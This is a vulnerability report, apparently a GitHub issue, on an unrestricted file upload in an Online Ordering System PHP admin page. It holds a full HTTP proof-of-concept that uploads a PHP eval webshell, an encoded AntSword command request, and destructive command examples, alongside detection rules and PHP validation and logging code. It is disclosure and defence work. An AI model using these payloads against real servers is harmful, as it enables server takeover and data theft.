
code-projects Online Ordering System Project V1.0/admin/edit_product.php Unrestricted Upload #4

@zzb1388

Description

Vulnerability Description

A critical file upload vulnerability exists in the /admin/edit_product.php file of Library System V1.0, allowing attackers to upload malicious PHP scripts (such as AntSword webshells) by bypassing file type and content validation. Once uploaded, attackers can use the AntSword client to establish a connection via formatted POST requests, enabling full control over the target system, including executing system commands, browsing the file system, and stealing sensitive data.

Affected Products

Technical Details

Root Cause

  1. Inadequate File Upload Validation:
    The system fails to validate the image parameter uploaded via /admin/edit_product.php in the following ways:
    • No restriction on file extensions (allows executable scripts like .php, .php3);
    • No verification of MIME types (e.g., Content-Type can be forged as image/jpeg);
    • No content inspection (fails to detect PHP script signatures).
  2. Accessible Upload Path:
    Uploaded files are stored in a web-accessible directory (e.g., /uploads/) without execution permission restrictions.

Attack Vector

  1. Upload AntSword Webshell: Use a POST request to upload a PHP script with AntSword protocol;
  2. Connect via AntSword Client: Interact with the webshell using encrypted POST requests to transmit commands;
  3. Execute Remote Commands: Perform system commands and file operations through the AntSword interface.

POC (Proof of Concept)

1. POST Request Payload for Uploading AntSword Webshell

POST /OnlineOrderingSystem_PHP/onlineorderingsys/admin/edit_product.php?id=12 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------92661300142067782891941354941
Content-Length: 1080
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/OnlineOrderingSystem_PHP/onlineorderingsys/admin/edit_product.php?id=%3Cscript%3Ealert(xss)%3C/script%3E
Cookie: PHPSESSID=2v9rntr1vhkro9nuv5qf758jf5
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i

-----------------------------92661300142067782891941354941
Content-Disposition: form-data; name="name"

111111
-----------------------------92661300142067782891941354941
Content-Disposition: form-data; name="description"

111
-----------------------------92661300142067782891941354941
Content-Disposition: form-data; name="category"

Guitar
-----------------------------92661300142067782891941354941
Content-Disposition: form-data; name="originated"

111
-----------------------------92661300142067782891941354941
Content-Disposition: form-data; name="price"

11
-----------------------------92661300142067782891941354941
Content-Disposition: form-data; name="quantity"

111
-----------------------------92661300142067782891941354941
Content-Disposition: form-data; name="image"; filename="shell.php"
Content-Type: application/octet-stream

<?php
@eval($_POST['shell']);

?>
-----------------------------92661300142067782891941354941
Content-Disposition: form-data; name="update"


-----------------------------92661300142067782891941354941--

2. Sample POST Request for AntSword Connection

POST /uploads/aj.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded

a=ZXZhbCgkX1BPU1RbJ2MnXSk7

(The Base64 value decodes to: eval($_POST['c']);)

3. AntSword Client Configuration

  • URL: http://127.0.0.1/OnlineOrderingSystem_PHP/onlineorderingsys/admin/editproduct.php
  • Password: shell (corresponds to $_POST['shell'] in the webshell)

Impact

  1. Full System Control: Execute arbitrary system commands (e.g., cat /etc/passwd, rm -rf /);
  2. Sensitive Data Theft: Access database config files (e.g., config.php) and user information;
  3. Privilege Escalation & Lateral Movement: Exploit server vulnerabilities to escalate privileges or attack internal networks;
  4. Persistence of Malicious Backdoors: Upload additional backdoors for long-term system control.

Mitigation

Immediate Fixes

  1. Block Malicious Uploads:
    • Deny access to .php scripts in the upload directory via web server configuration (e.g., Apache, placed in that directory's <Directory> block or .htaccess so it applies only there):

      <FilesMatch "\.(php|php3|php5|phtml)$">
          Require all denied
      </FilesMatch>

  2. Block AntSword-Specific Requests:
    • Add WAF rules to intercept uploads containing eval(base64_decode or POST parameters with a=ZXZ (AntSword's Base64 prefix).

Long-Term Solutions

  1. Enhance File Upload Validation:
    • Whitelist Validation: Allow only image uploads (e.g., .jpg|.png) and verify real formats via getimagesize();
    • Content Inspection: Use the fileinfo extension to check file magic numbers and prevent script disguising;
    • Random Rename: Store uploaded files with UUID names in non-web-accessible directories (e.g., /data/uploads/).
  2. Restrict Directory Execution Permissions:
    • Set upload directories as non-executable (e.g., Nginx, scoped to the upload location and placed before the general PHP location so other scripts keep working: location ~* ^/uploads/.*\.php$ { deny all; }).
  3. Monitor Anomalous Requests:
    • Log requests containing dangerous functions like eval and base64_decode;
    • Deploy EDR tools to monitor PHP file execution in web directories.
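To show what the validation missing under Root Cause, and items 1 and 2 of the long-term solutions, look like in code, here is an added example in PHP. It is not code from the Online Ordering System project or from this report; it assumes PHP 8 with the fileinfo extension enabled, and the storage directory /var/app/data/uploads, the function names and the constructed test inputs are placeholders chosen for this example.

```php
<?php
// Added example, not the project's code: hardened handling of the `image`
// field of the product form. Assumes PHP >= 8.0 with the fileinfo extension.
declare(strict_types=1);

const UPLOAD_DIR      = '/var/app/data/uploads';   // assumed; outside DocumentRoot
const MAX_IMAGE_BYTES = 2 * 1024 * 1024;

// Extension whitelist mapped to the MIME type the file CONTENT must have.
const ALLOWED_IMAGE_TYPES = [
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
];

/**
 * Validate a file on disk as an image the application accepts.
 * $clientName is the attacker-controlled filename from the multipart part; only
 * its extension is consulted, and only against the whitelist. Returns the
 * normalised extension or throws with the rejection reason.
 */
function validateImageFile(string $path, string $clientName): string
{
    if (!is_file($path) || filesize($path) === 0 || filesize($path) > MAX_IMAGE_BYTES) {
        throw new RuntimeException('missing, empty or oversized file');
    }

    // 1. Extension whitelist: shell.php, shell.php3, shell.phtml all fail here.
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!isset(ALLOWED_IMAGE_TYPES[$ext])) {
        throw new RuntimeException("extension '$ext' not allowed");
    }
    $expectedMime = ALLOWED_IMAGE_TYPES[$ext];

    // 2. Magic-number check via fileinfo. The client's Content-Type header is
    //    never consulted: it is trivially forged (image/jpeg on a PHP file).
    $detected = (new finfo(FILEINFO_MIME_TYPE))->file($path) ?: 'unknown';
    if ($detected !== $expectedMime) {
        throw new RuntimeException("content is $detected, expected $expectedMime");
    }

    // 3. Structural check: the file must parse as an image of the same type.
    $info = @getimagesize($path);
    if ($info === false || ($info['mime'] ?? null) !== $expectedMime) {
        throw new RuntimeException('file does not parse as an image');
    }

    return $ext;
}

/**
 * Move a validated upload to UPLOAD_DIR under a random name and return that
 * name (the only thing to store in the database). The original name is never
 * used on disk, so double extensions or path tricks in it are irrelevant.
 */
function storeProductImage(array $file, string $uploadDir = UPLOAD_DIR): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload error ' . ($file['error'] ?? 'none'));
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not a file uploaded in this request');
    }
    $ext  = validateImageFile($file['tmp_name'], (string) $file['name']);
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $uploadDir . '/' . $name)) {
        throw new RuntimeException('could not store file');
    }
    chmod($uploadDir . '/' . $name, 0640);   // readable by the app, never executable
    return $name;
}

// Stand-alone demonstration on constructed inputs written to a temp directory.
if (PHP_SAPI === 'cli') {
    $dir = sys_get_temp_dir() . '/upload-demo-' . bin2hex(random_bytes(4));
    mkdir($dir, 0700);
    // A real 1x1 PNG, and the webshell body shown in this report.
    $png   = base64_decode('iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg==');
    $shell = "<?php\n@eval(\$_POST['shell']);\n?>\n";
    $cases = [
        ['shell.php', $shell],   // rejected at step 1 (extension)
        ['shell.jpg', $shell],   // rejected at step 2 (fileinfo reports PHP, not JPEG)
        ['photo.jpg', $png],     // rejected at step 2 (PNG content under a .jpg name)
        ['photo.png', $png],     // accepted
    ];
    foreach ($cases as [$clientName, $bytes]) {
        $tmp = $dir . '/part';
        file_put_contents($tmp, $bytes);
        try {
            printf("%-10s accepted as .%s\n", $clientName, validateImageFile($tmp, $clientName));
        } catch (RuntimeException $e) {
            printf("%-10s rejected: %s\n", $clientName, $e->getMessage());
        }
    }
    array_map('unlink', glob($dir . '/*'));
    rmdir($dir);
}
```

Run it with `php upload_check.php` to see each constructed case accepted or rejected with its reason. One caveat a reviewer would raise: a genuine image with PHP appended after the image data passes both fileinfo and getimagesize, so steps 2 and 3 reduce the attack surface but do not replace storing files outside the web root with execution disabled; re-encoding accepted images with GD or Imagick additionally strips such trailing payloads.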
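For the request logging suggested in item 3 (and the WAF-style matching under Immediate Fixes), here is an added PHP example, not part of this report or of the project, that inspects a request body for the indicators this report describes and emits a log line. It assumes deployment through the php.ini auto_prepend_file setting so it runs before every script; the indicator regexes, function names and sample bodies are constructed for the example and are not from the original.

```php
<?php
// Added example, not part of the advisory or the project: application-side
// logging of requests carrying the indicators described in this report.
// Assumed deployment: php.ini `auto_prepend_file=/path/to/inspect.php`.
declare(strict_types=1);

// Indicator name => regex applied to the raw request body (constructed set).
const BODY_INDICATORS = [
    'php_open_tag'    => '/<\?(php|=)/i',
    'eval_call'       => '/\beval\s*\(/i',
    'base64_decode'   => '/\bbase64_decode\s*\(/i',
    'script_filename' => '/filename="[^"]*\.(php\d?|phtml|phar)"/i',
];

/**
 * Return the indicator names found in a request body. For urlencoded bodies
 * each parameter value is additionally Base64-decoded (strict) and rescanned,
 * which catches an encoded eval(...) regardless of the parameter name and
 * without depending on the literal `a=ZXZ` prefix.
 */
function inspectRequestBody(string $contentType, string $body): array
{
    $hits = [];
    foreach (BODY_INDICATORS as $name => $re) {
        if (preg_match($re, $body) === 1) {
            $hits[] = $name;
        }
    }
    if (stripos($contentType, 'application/x-www-form-urlencoded') === 0) {
        parse_str($body, $params);
        foreach ($params as $key => $value) {
            if (!is_string($value)) {
                continue;
            }
            $decoded = base64_decode($value, true);
            if ($decoded === false) {
                continue;
            }
            foreach (['eval_call', 'base64_decode', 'php_open_tag'] as $name) {
                if (preg_match(BODY_INDICATORS[$name], $decoded) === 1) {
                    $hits[] = "b64:$name(param=$key)";
                }
            }
        }
    }
    return array_values(array_unique($hits));
}

/** One log line; error_log() keeps it in the SAPI error log for the SOC to collect. */
function formatAlert(string $ip, string $uri, array $hits): string
{
    return sprintf('suspicious-request ip=%s uri=%s indicators=%s', $ip, $uri, implode(',', $hits));
}

if (PHP_SAPI !== 'cli') {
    $ct = $_SERVER['CONTENT_TYPE'] ?? '';
    if (stripos($ct, 'multipart/form-data') === 0) {
        // php://input is empty for multipart bodies; rebuild the file parts from $_FILES.
        $body = '';
        foreach ($_FILES as $f) {
            if (is_string($f['name']) && is_file($f['tmp_name'])) {
                $body .= 'filename="' . $f['name'] . "\"\n" . file_get_contents($f['tmp_name']) . "\n";
            }
        }
    } else {
        $body = (string) file_get_contents('php://input');
    }
    $hits = inspectRequestBody($ct, $body);
    if ($hits !== []) {
        error_log(formatAlert($_SERVER['REMOTE_ADDR'] ?? '-', $_SERVER['REQUEST_URI'] ?? '-', $hits));
    }
} else {
    // Constructed samples modelled on the two requests shown in this report.
    $boundary  = '---------------------------92661300142067782891941354941';
    $multipart = implode("\r\n", [
        "--$boundary",
        'Content-Disposition: form-data; name="image"; filename="shell.php"',
        'Content-Type: application/octet-stream',
        '',
        '<?php',
        "@eval(\$_POST['shell']);",
        '?>',
        "--$boundary--",
        '',
    ]);
    $samples = [
        ['multipart/form-data; boundary=' . $boundary, $multipart],
        ['application/x-www-form-urlencoded', 'a=ZXZhbCgkX1BPU1RbJ2MnXSk7'],
        ['application/x-www-form-urlencoded', 'name=Guitar&price=11'],
    ];
    foreach ($samples as $i => [$ct, $body]) {
        $hits = inspectRequestBody($ct, $body);
        echo $hits === [] ? "sample $i: clean\n"
                          : formatAlert('127.0.0.1', '/admin/edit_product.php', $hits) . " (sample $i)\n";
    }
}
```

Run with `php inspect.php` to see the upload sample flagged on php_open_tag, eval_call and script_filename, the encoded sample flagged only after Base64 decoding of parameter a, and the ordinary form submission reported as clean. Logging rather than blocking is deliberate at this layer: the blocking belongs in the upload validation and in the web server's execution restrictions, while these log lines give the SOC the request-level evidence to alert on.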

Proof of Concept Screenshots

  1. AntSword webshell upload success (screenshot not reproduced here)
  2. AntSword executing system commands (screenshot not reproduced here)

Submitter: AlbaDove
